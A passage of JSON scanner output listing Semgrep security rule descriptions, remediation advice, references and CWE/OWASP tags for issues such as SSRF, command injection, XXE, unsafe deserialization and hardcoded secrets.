request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-urllib3.tainted-flask-http-request-urllib3)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-urllib3.tainted-flask-http-request-urllib3","id":"python.flask.net.tainted-flask-http-request-urllib3.tainted-flask-http-request-urllib3","name":"python.flask.net.tainted-flask-http-request-urllib3.tainted-flask-http-request-urllib3","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.net.tainted-flask-http-request-urllib3.tainted-flask-http-request-urllib3"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Stacktrace information is displayed in a non-Development environment. Accidentally disclosing sensitive stack trace information in a production environment aids an attacker in reconnaissance and information gathering."},"help":{"markdown":"Stacktrace information is displayed in a non-Development environment. Accidentally disclosing sensitive stack trace information in a production environment aids an attacker in reconnaissance and information gathering.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.stacktrace-disclosure.stacktrace-disclosure)\n - [https://cwe.mitre.org/data/definitions/209.html](https://cwe.mitre.org/data/definitions/209.html)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design/](https://owasp.org/Top10/A04_2021-Insecure_Design/)\n","text":"Stacktrace information is displayed in a non-Development environment. Accidentally disclosing sensitive stack trace information in a production environment aids an attacker in reconnaissance and information gathering."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.stacktrace-disclosure.stacktrace-disclosure","id":"csharp.lang.security.stacktrace-disclosure.stacktrace-disclosure","name":"csharp.lang.security.stacktrace-disclosure.stacktrace-disclosure","properties":{"precision":"very-high","tags":["CWE-209: Generation of Error Message Containing Sensitive Information","HIGH CONFIDENCE","OWASP-A04:2021 - Insecure Design","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.stacktrace-disclosure.stacktrace-disclosure"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options."},"help":{"markdown":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-dotenv-variable-flask.tainted-dotenv-variable-flask)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-dotenv-variable-flask.tainted-dotenv-variable-flask","id":"python.flask.os.tainted-dotenv-variable-flask.tainted-dotenv-variable-flask","name":"python.flask.os.tainted-dotenv-variable-flask.tainted-dotenv-variable-flask","properties":{"precision":"very-high","tags":["CWE-454: External Initialization of Trusted Variables or Data Stores","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-dotenv-variable-flask.tainted-dotenv-variable-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. In PHP, it is possible to use `escapeshellcmd(...)` and `escapeshellarg(...)` to correctly sanitize input when used respectively as system commands or command arguments."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. In PHP, it is possible to use `escapeshellcmd(...)` and `escapeshellarg(...)` to correctly sanitize input when used respectively as system commands or command arguments.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-command-injection.laravel-command-injection)\n - [https://www.php.net/manual/en/ref.exec.php](https://www.php.net/manual/en/ref.exec.php)\n - [https://www.php.net/manual/en/ref.filesystem.php](https://www.php.net/manual/en/ref.filesystem.php)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. In PHP, it is possible to use `escapeshellcmd(...)` and `escapeshellarg(...)` to correctly sanitize input when used respectively as system commands or command arguments."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-command-injection.laravel-command-injection","id":"php.laravel.security.laravel-command-injection.laravel-command-injection","name":"php.laravel.security.laravel-command-injection.laravel-command-injection","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-command-injection.laravel-command-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.xml.tainted-flask-xml-libxml2.tainted-flask-xml-libxml2)\n - [https://github.com/vingd/libxml2-python/blob/libxml2-python-2.9.1/libxml2.py](https://github.com/vingd/libxml2-python/blob/libxml2-python-2.9.1/libxml2.py)\n - [https://gitlab.gnome.org/GNOME/libxml2/-/wikis/Python-bindings](https://gitlab.gnome.org/GNOME/libxml2/-/wikis/Python-bindings)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"helpUri":"https://semgrep.dev/r/python.flask.xml.tainted-flask-xml-libxml2.tainted-flask-xml-libxml2","id":"python.flask.xml.tainted-flask-xml-libxml2.tainted-flask-xml-libxml2","name":"python.flask.xml.tainted-flask-xml-libxml2.tainted-flask-xml-libxml2","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.xml.tainted-flask-xml-libxml2.tainted-flask-xml-libxml2"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The Connection.recv() method automatically unpickles the data it receives, which can be a security risk unless you can trust the process which sent the message. Therefore, unless the connection object was produced using Pipe() you should only use the recv() and send() methods after performing some sort of authentication. See more dettails: https://docs.python.org/3/library/multiprocessing.html?highlight=security#multiprocessing.connection.Connection"},"help":{"markdown":"The Connection.recv() method automatically unpickles the data it receives, which can be a security risk unless you can trust the process which sent the message. Therefore, unless the connection object was produced using Pipe() you should only use the recv() and send() methods after performing some sort of authentication. See more dettails: https://docs.python.org/3/library/multiprocessing.html?highlight=security#multiprocessing.connection.Connection\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.conn_recv.multiprocessing-recv)\n - [https://docs.python.org/3/library/multiprocessing.html?highlight=security#multiprocessing.connection.Connection](https://docs.python.org/3/library/multiprocessing.html?highlight=security#multiprocessing.connection.Connection)\n","text":"The Connection.recv() method automatically unpickles the data it receives, which can be a security risk unless you can trust the process which sent the message. Therefore, unless the connection object was produced using Pipe() you should only use the recv() and send() methods after performing some sort of authentication. See more dettails: https://docs.python.org/3/library/multiprocessing.html?highlight=security#multiprocessing.connection.Connection"},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.conn_recv.multiprocessing-recv","id":"python.lang.security.audit.conn_recv.multiprocessing-recv","name":"python.lang.security.audit.conn_recv.multiprocessing-recv","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.conn_recv.multiprocessing-recv"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype. Use literal values for object properties."},"help":{"markdown":"Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype. Use literal values for object properties.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.audit.remote-property-injection.remote-property-injection)\n - [https://github.com/nodesecurity/eslint-plugin-security/blob/3c7522ca1be800353513282867a1034c795d9eb4/docs/the-dangers-of-square-bracket-notation.md](https://github.com/nodesecurity/eslint-plugin-security/blob/3c7522ca1be800353513282867a1034c795d9eb4/docs/the-dangers-of-square-bracket-notation.md)\n","text":"Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype. Use literal values for object properties."},"helpUri":"https://semgrep.dev/r/javascript.express.security.audit.remote-property-injection.remote-property-injection","id":"javascript.express.security.audit.remote-property-injection.remote-property-injection","name":"javascript.express.security.audit.remote-property-injection.remote-property-injection","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","LOW CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.audit.remote-property-injection.remote-property-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected use of the `none` algorithm in a JWT token. The `none` algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the `none` algorithm. Instead, use an algorithm such as `HS256`."},"help":{"markdown":"Detected use of the `none` algorithm in a JWT token. The `none` algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the `none` algorithm. Instead, use an algorithm such as `HS256`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.java-jwt.jwt-none-alg.jwt-none-alg)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected use of the `none` algorithm in a JWT token. The `none` algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the `none` algorithm. Instead, use an algorithm such as `HS256`."},"helpUri":"https://semgrep.dev/r/kotlin.java-jwt.jwt-none-alg.jwt-none-alg","id":"kotlin.java-jwt.jwt-none-alg.jwt-none-alg","name":"kotlin.java-jwt.jwt-none-alg.jwt-none-alg","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.java-jwt.jwt-none-alg.jwt-none-alg"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The password on '$MODEL' is being set without validating the password. Call django.contrib.auth.password_validation.validate_password() with validation functions before setting the password. See https://docs.djangoproject.com/en/3.0/topics/auth/passwords/ for more information."},"help":{"markdown":"The password on '$MODEL' is being set without validating the password. Call django.contrib.auth.password_validation.validate_password() with validation functions before setting the password. See https://docs.djangoproject.com/en/3.0/topics/auth/passwords/ for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.audit.unvalidated-password.unvalidated-password)\n - [https://docs.djangoproject.com/en/3.0/topics/auth/passwords/#module-django.contrib.auth.password_validation](https://docs.djangoproject.com/en/3.0/topics/auth/passwords/#module-django.contrib.auth.password_validation)\n","text":"The password on '$MODEL' is being set without validating the password. Call django.contrib.auth.password_validation.validate_password() with validation functions before setting the password. See https://docs.djangoproject.com/en/3.0/topics/auth/passwords/ for more information."},"helpUri":"https://semgrep.dev/r/python.django.security.audit.unvalidated-password.unvalidated-password","id":"python.django.security.audit.unvalidated-password.unvalidated-password","name":"python.django.security.audit.unvalidated-password.unvalidated-password","properties":{"precision":"very-high","tags":["CWE-521: Weak Password Requirements","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.audit.unvalidated-password.unvalidated-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 600K iterations should be used with SHA256"},"help":{"markdown":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 600K iterations should be used with SHA256\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insufficient-pbkdf2-work-factor-sha256.insufficient-pbkdf2-work-factor-sha256)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n - [https://pages.nist.gov/800-63-3/sp800-63b.html#sec5](https://pages.nist.gov/800-63-3/sp800-63b.html#sec5)\n","text":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 600K iterations should be used with SHA256"},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insufficient-pbkdf2-work-factor-sha256.insufficient-pbkdf2-work-factor-sha256","id":"swift.commoncrypto.insufficient-pbkdf2-work-factor-sha256.insufficient-pbkdf2-work-factor-sha256","name":"swift.commoncrypto.insufficient-pbkdf2-work-factor-sha256.insufficient-pbkdf2-work-factor-sha256","properties":{"precision":"very-high","tags":["CWE-916: Use of Password Hash With Insufficient Computational Effort","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insufficient-pbkdf2-work-factor-sha256.insufficient-pbkdf2-work-factor-sha256"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Service '$SERVICE' is explicitly disabling SELinux separation. This runs the service as an unconfined type. Remove 'label:disable' to prevent this."},"help":{"markdown":"Service '$SERVICE' is explicitly disabling SELinux separation. This runs the service as an unconfined type. Remove 'label:disable' to prevent this.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.docker-compose.security.selinux-separation-disabled.selinux-separation-disabled)\n - [https://www.projectatomic.io/blog/2016/03/dwalsh_selinux_containers/](https://www.projectatomic.io/blog/2016/03/dwalsh_selinux_containers/)\n - [https://docs.docker.com/engine/reference/run/#security-configuration](https://docs.docker.com/engine/reference/run/#security-configuration)\n","text":"Service '$SERVICE' is explicitly disabling SELinux separation. This runs the service as an unconfined type. Remove 'label:disable' to prevent this."},"helpUri":"https://semgrep.dev/r/yaml.docker-compose.security.selinux-separation-disabled.selinux-separation-disabled","id":"yaml.docker-compose.security.selinux-separation-disabled.selinux-separation-disabled","name":"yaml.docker-compose.security.selinux-separation-disabled.selinux-separation-disabled","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.docker-compose.security.selinux-separation-disabled.selinux-separation-disabled"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Overwriting `transformLinkUri` or `transformImageUri` to something insecure, or turning `allowDangerousHtml` on, or turning `escapeHtml` off, will open the code up to XSS vectors."},"help":{"markdown":"Overwriting `transformLinkUri` or `transformImageUri` to something insecure, or turning `allowDangerousHtml` on, or turning `escapeHtml` off, will open the code up to XSS vectors.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.react.security.react-markdown-insecure-html.react-markdown-insecure-html)\n - [https://www.npmjs.com/package/react-markdown#security](https://www.npmjs.com/package/react-markdown#security)\n","text":"Overwriting `transformLinkUri` or `transformImageUri` to something insecure, or turning `allowDangerousHtml` on, or turning `escapeHtml` off, will open the code up to XSS vectors."},"helpUri":"https://semgrep.dev/r/typescript.react.security.react-markdown-insecure-html.react-markdown-insecure-html","id":"typescript.react.security.react-markdown-insecure-html.react-markdown-insecure-html","name":"typescript.react.security.react-markdown-insecure-html.react-markdown-insecure-html","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.react.security.react-markdown-insecure-html.react-markdown-insecure-html"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Outlook Team detected"},"help":{"markdown":"Outlook Team detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-outlook-team.detected-outlook-team)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Outlook Team detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-outlook-team.detected-outlook-team","id":"generic.secrets.security.detected-outlook-team.detected-outlook-team","name":"generic.secrets.security.detected-outlook-team.detected-outlook-team","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-outlook-team.detected-outlook-team"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.hardcoded.headers.hardcoded-github-token.hardcoded-github-token)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.lang.hardcoded.headers.hardcoded-github-token.hardcoded-github-token","id":"javascript.lang.hardcoded.headers.hardcoded-github-token.hardcoded-github-token","name":"javascript.lang.hardcoded.headers.hardcoded-github-token.hardcoded-github-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.hardcoded.headers.hardcoded-github-token.hardcoded-github-token"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found user controlled content in `run_string`. This is dangerous because it allows a malicious actor to run arbitrary Python code."},"help":{"markdown":"Found user controlled content in `run_string`. This is dangerous because it allows a malicious actor to run arbitrary Python code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.dangerous-subinterpreters-run-string.dangerous-subinterpreters-run-string)\n - [https://bugs.python.org/issue43472](https://bugs.python.org/issue43472)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n","text":"Found user controlled content in `run_string`. This is dangerous because it allows a malicious actor to run arbitrary Python code."},"helpUri":"https://semgrep.dev/r/python.lang.security.dangerous-subinterpreters-run-string.dangerous-subinterpreters-run-string","id":"python.lang.security.dangerous-subinterpreters-run-string.dangerous-subinterpreters-run-string","name":"python.lang.security.dangerous-subinterpreters-run-string.dangerous-subinterpreters-run-string","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.dangerous-subinterpreters-run-string.dangerous-subinterpreters-run-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Because portions of the logging configuration are passed through eval(), use of this function may open its users to a security risk. While the function only binds to a socket on localhost, and so does not accept connections from remote machines, there are scenarios where untrusted code could be run under the account of the process which calls listen(). To avoid this happening, use the `verify()` argument to `listen()` to prevent unrecognized configurations."},"help":{"markdown":"Because portions of the logging configuration are passed through eval(), use of this function may open its users to a security risk. While the function only binds to a socket on localhost, and so does not accept connections from remote machines, there are scenarios where untrusted code could be run under the account of the process which calls listen(). To avoid this happening, use the `verify()` argument to `listen()` to prevent unrecognized configurations.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.logging.listeneval.listen-eval)\n - [https://docs.python.org/3/library/logging.config.html?highlight=security#logging.config.listen](https://docs.python.org/3/library/logging.config.html?highlight=security#logging.config.listen)\n","text":"Because portions of the logging configuration are passed through eval(), use of this function may open its users to a security risk. While the function only binds to a socket on localhost, and so does not accept connections from remote machines, there are scenarios where untrusted code could be run under the account of the process which calls listen(). To avoid this happening, use the `verify()` argument to `listen()` to prevent unrecognized configurations."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.logging.listeneval.listen-eval","id":"python.lang.security.audit.logging.listeneval.listen-eval","name":"python.lang.security.audit.logging.listeneval.listen-eval","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.logging.listeneval.listen-eval"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The preceding call to `$SOURCE` can return a negative value when an error is encountered. This can lead to an out-of-bounds array access and possible memory corruption."},"help":{"markdown":"The preceding call to `$SOURCE` can return a negative value when an error is encountered. This can lead to an out-of-bounds array access and possible memory corruption.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.memory.negative-return-value-array-index.negative-return-value-array-index)\n - [https://cwe.mitre.org/data/definitions/787.html](https://cwe.mitre.org/data/definitions/787.html)\n","text":"The preceding call to `$SOURCE` can return a negative value when an error is encountered. This can lead to an out-of-bounds array access and possible memory corruption."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.memory.negative-return-value-array-index.negative-return-value-array-index","id":"cpp.lang.security.memory.negative-return-value-array-index.negative-return-value-array-index","name":"cpp.lang.security.memory.negative-return-value-array-index.negative-return-value-array-index","properties":{"precision":"very-high","tags":["CWE-787: Out-of-bounds Write","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.memory.negative-return-value-array-index.negative-return-value-array-index"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"DOCTYPE declarations are enabled for this DocumentBuilderFactory. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://apache.org/xml/features/disallow-doctype-decl\" to true. Alternatively, allow DOCTYPE declarations and only prohibit external entities declarations. This can be done by setting the features \"http://xml.org/sax/features/external-general-entities\" and \"http://xml.org/sax/features/external-parameter-entities\" to false."},"help":{"markdown":"DOCTYPE declarations are enabled for this DocumentBuilderFactory. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://apache.org/xml/features/disallow-doctype-decl\" to true. Alternatively, allow DOCTYPE declarations and only prohibit external entities declarations. This can be done by setting the features \"http://xml.org/sax/features/external-general-entities\" and \"http://xml.org/sax/features/external-parameter-entities\" to false.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://blog.sonarsource.com/secure-xml-processor](https://blog.sonarsource.com/secure-xml-processor)\n - [https://xerces.apache.org/xerces2-j/features.html](https://xerces.apache.org/xerces2-j/features.html)\n","text":"DOCTYPE declarations are enabled for this DocumentBuilderFactory. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://apache.org/xml/features/disallow-doctype-decl\" to true. Alternatively, allow DOCTYPE declarations and only prohibit external entities declarations. This can be done by setting the features \"http://xml.org/sax/features/external-general-entities\" and \"http://xml.org/sax/features/external-parameter-entities\" to false."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing","id":"java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing","name":"java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data 